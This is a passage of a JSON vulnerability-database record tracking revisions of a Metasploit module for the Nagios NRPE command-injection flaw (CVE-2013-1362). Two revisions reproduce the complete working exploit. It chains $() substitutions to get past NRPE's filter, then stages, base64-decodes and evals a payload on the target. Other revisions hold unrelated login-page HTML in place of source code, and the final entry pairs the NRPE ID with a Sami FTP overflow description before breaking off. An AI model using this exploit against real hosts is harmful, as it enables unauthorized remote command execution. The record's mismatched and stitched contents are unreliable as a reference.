["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "saint", "idList": ["SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:E0F846270087DB671556237BDF17DDDE"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-06-17T14:38:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n<html>\n\t<head>\n\t\t<title>sso login check</title>\n\t\t\n\t\t<meta charset=\"utf-8\"/>\n\t\t<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" />\n\t\t<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\n\t\t<meta http-equiv=\"CACHE-CONTROL\" content=\"NO-CACHE\" />\n\t\t<meta http-equiv=\"PRAGMA\" content=\"NO-CACHE\" />\n\t\t<meta http-equiv=\"EXPIRES\" content=\"0\" />\n\t</head>\n \t<body>\n \t<script src=\"http://127.0.0.1:12381/auth\" language=\"javascript\" type=\"text/javascript\"></script> \n\t\t<script language=\"javascript\" type=\"text/javascript\">\n\t\t\tfunction getOrigURLParamValue() \n\t\t\t{\n\t\t\t\tvar orig_url_param = 'orig_url=';\n\t\t\t\tvar decodedUrlParameters = decodeURIComponent(location.search);\n\t\t\t\tvar decodedOrigParam = (new RegExp(orig_url_param + '.*').exec(decodedUrlParameters)||[,\"\"])[0].replace(orig_url_param, '').replace(/\\+/g, '%20')||null;\n\t\t\t\tvar encodedOrigParam = encodeURIComponent(decodedOrigParam);\n\n\t\t\t\t//console.log('Decoded URL Params: ' + decodedUrlParameters);\n\t\t\t\t//console.log('decodedOrigParam: ' + 
decodedOrigParam);\n\t\t\t\t//console.log('encodedOrigParam: ' + encodedOrigParam);\n\n\t\t\t\treturn encodedOrigParam;\n\n\t\t\t}\n\n\t\t\tfunction empty(str)\n\t\t\t{\t\n\t\t\t\treturn !str || !/[^\\s]+/.test(str);\n\t\t\t}\n\t\t\t\n\t\t\tvar encodedOrigUrl = getOrigURLParamValue();\n\t\t\t\n\t\t\ttry\n\t\t\t{\n\t\t\t\tif(typeof(gCtchLogonInfo) !== 'undefined')\n\t\t\t\t{\t \t\n\t\t\t\t\tvar modified_redirect_url = \"https://\" + window.location.hostname +'/EUP/transparent_login/?orig_url=' + encodedOrigUrl + '&winUserId=' +gCtchLogonInfo.winUserId ;\n\t\t\t\t\tif (!empty(gCtchLogonInfo.orgName))\n\t\t\t\t\t{\n\t\t\t\t\t\tmodified_redirect_url = modified_redirect_url.concat(\"&orgName=\",gCtchLogonInfo.orgName);\n\t\t\t\t\t}\n\t\t\t\t\tif (!empty(gCtchLogonInfo.userName))\n\t\t\t\t\t{\n\t\t\t\t\t\tmodified_redirect_url = modified_redirect_url.concat(\"&userName=\",gCtchLogonInfo.userName);\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\tdocument.location.href = modified_redirect_url;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tdocument.location.href = \"https://\" + window.location.hostname + '/EUP/login?orig_url=' + encodedOrigUrl;\n\t\t\t\t}\n\t\t\t}\n\t\t\tcatch(e)\n\t\t\t{\n\t\t\t\tdocument.location.href = \"https://\" + window.location.hostname + '/EUP/login?orig_url='+ encodedOrigUrl;\n\t\t\t}\n\t\t</script> \n\n\t</body> \n</html>\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-21T04:27:58", "differentElements": ["modified", "published", "sourceData"], "edition": 100}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. 
NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-06-21T06:31:02", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2019-06-21T06:31:02"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "ALA_ALAS-2013-203.NASL", "NAGIOS_NRPE_2_14.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9836.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:865802", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310850460", "OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:850460", "OPENVAS:850457", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310121262"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "saint", "idList": ["SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:E0F846270087DB671556237BDF17DDDE"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", 
"idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-06-21T06:31:02"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must 
be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << 
\"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", 
"metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-21T06:31:02", "differentElements": ["sourceData"], "edition": 101}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "0a76f78c502c6c4ab078a51c1ec264f4", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-07-14T18:24:19", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 8.2, "vector": "NONE", "modified": "2019-07-14T18:24:19"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "openvas", "idList": ["OPENVAS:865802", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310120026", "OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865802", "OPENVAS:850460", "OPENVAS:1361412562310865756", "OPENVAS:850457", "OPENVAS:1361412562310121262"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "FEDORA_2013-9836.NASL", "NAGIOS_NRPE_2_14.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "OPENSUSE-2013-301.NASL", "ALA_ALAS-2013-203.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "suse", "idList": 
["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "saint", "idList": ["SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-07-14T18:24:19"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "<!DOCTYPE html>\n<html>\n<head>\n\t<meta charset=\"UTF-8\" />\n\t<meta content=\"\" name=\"csrf-token\" />\n\t<meta content=\"width=device-width, initial-scale=1\" name=\"viewport\" />\n\t<title>Lightspeed System - Web Access</title>\n\t<link rel=\"stylesheet\" href=\"/css/access/access.css\" type=\"text/css\" />\n\t<link rel=\"icon\" href=\"/images/favicon.ico\" type=\"image/x-icon\" />\n</head>\n\n<script type='text/javascript'>\n\twindow.onload = function(){\n\t\tvar form = document.getElementById(\"login_form\");\n\t\tdocument.getElementById(\"submit_link\").addEventListener(\"click\", function(){\n\t\t\tform.submit();\n\t\t});\n\t};\n\n\tfunction enter_submit(e) {\n\t\tif (e && e.keyCode == 13) {\n\t\t\tvar form = document.getElementById(\"login_form\");\n\t\t\tform.submit();\n\t\t}\n\t}\n</script>\n\n<body>\n\t<div class=\"page-icon\">\n\t\t<div class=\"page-icon--img page-icon--imgAccess\">\n\t\t</div>\n\t</div>\n\n\t\n\n\t<div class=\"strip\"><h1>Captive Portal</h1>\n\t</div>\n\n\t<div>\n\t\t<p class=\"text--blueGray\">Please login to browse the internet.</p>\n\t</div>\n\n\t\n\n\t<div class=\"override\">\n\t\t<form id=\"login_form\" class=\"form\" action=\"/access/portal\" 
method=\"post\">\n\t\t\t<span onkeyup=\"enter_submit(event);\">\n\t\t\t\t<input type=\"hidden\" name=\"auth_source_id\", value=\"3\">\n\t\t\t\t<input type=\"hidden\" name=\"id\" value=\"EL58JZNWBX7ALBUJ81LO1HC6NY6UB1JQ\" />\n\t\t\t\t<input type=\"text\" name=\"username\" placeholder=\"Username\" />\n\t\t\t\t<input type=\"password\" name=\"password\" placeholder=\"Password\" />\n\t\t\t</span>\n\t\t\t<a id=\"submit_link\" class=\"button button--blue\" href=\"#\">Login</a>\n\t\t\t<br/><br/>\n\n\t\t\t\n\n\t\t\t<div class=\"signinForm-options l-flex l-flex--vAlignBaseline\">\n\t\t\t\t<div class=\"l-flex-item--allotWidth\">\n\t\t\t\t\t<section class=\"signinSSOButtons signinSSOButtons--noAnimation\">\n\t\t\t\t\t\t\n\t\t\t\t\t</section>\n\t\t\t\t</div>\n\t\t\t</div>\n\t\t</form>\n\t</div>\n\n\t\n</body>\n</html>\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-14T18:24:19", "differentElements": ["sourceData"], "edition": 102}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-07-14T20:23:37", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2019-07-14T20:23:37"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "openvas", "idList": ["OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310850460", "OPENVAS:865802", "OPENVAS:850457", "OPENVAS:1361412562310865802", "OPENVAS:850460", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310121262"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121287", "PACKETSTORM:120507"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "nessus", "idList": ["FEDORA_2013-9848.NASL", "FEDORA_2013-9829.NASL", "OPENSUSE-2013-301.NASL", "ALA_ALAS-2013-203.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "NAGIOS_NRPE_2_14.NASL", "FEDORA_2013-9836.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-07-14T20:23:37"}}, "objectVersion": "1.4", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 
'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f 
/tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-14T20:23:37", "differentElements": 
["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 103}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "aacf6fb7f493d995b9e85bda84c24055", "type": "metasploit", "bulletinFamily": "exploit", "title": "Sami FTP Server LIST Command Buffer Overflow", "description": "This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1. The vulnerability exists in the processing of LIST commands. In order to trigger the vulnerability, the \"Log\" tab must be viewed in the Sami FTP Server managing application, in the target machine. On the other hand, the source IP address used to connect with the FTP Server is needed. If the user can't provide it, the module will try to resolve it. This module has been tested successfully on Sami FTP Server 2.0.1 over Windows XP SP3.\n", "published": "2013-03-13T21:27:02", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-25T00:50:00", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2019-07-25T00:50:00"}, "dependencies": {"references": [{"type": "impervablog", "idList": ["IMPERVABLOG:AF2AAA49E9DD7BE427896C13739AB1F5"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:353CB4603C296A43DDDDDAE6CAC6BE25"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142662", "OPENVAS:1361412562310891863", "OPENVAS:1361412562310891862", "OPENVAS:1361412562310704486", "OPENVAS:1361412562310704485"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-1840", "ELSA-2019-1839", "ELSA-2019-1777"]}, {"type": "exploitdb", "idList": ["EDB-ID:47154"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1794-1", "OPENSUSE-SU-2019:1793-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1863-1:26EA8", "DEBIAN:DLA-1862-1:8E150"]}, {"type": "thn", "idList": ["THN:AB717FBC8FF7C7C1D194A126C788DF50"]}, {"type": 
"threatpost", "idList": ["THREATPOST:5049F818B995E5121EDA184A34A957E6"]}, {"type": "cve", "idList": ["CVE-2019-11693"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "kitploit", "idList": ["KITPLOIT:1450641854881225942"]}], "modified": "2019-07-25T00:50:00"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/sami_ftpd_list.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = LowRanking\n\n include Msf::Exploit::Remote::Ftp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t\t => 'Sami FTP Server LIST Command Buffer Overflow',\n 'Description'\t => %q{\n This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1.\n The vulnerability exists in the processing of LIST commands. In order to trigger\n the vulnerability, the \"Log\" tab must be viewed in the Sami FTP Server managing\n application, in the target machine. On the other hand, the source IP address used\n to connect with the FTP Server is needed. If the user can't provide it, the module\n will try to resolve it. 
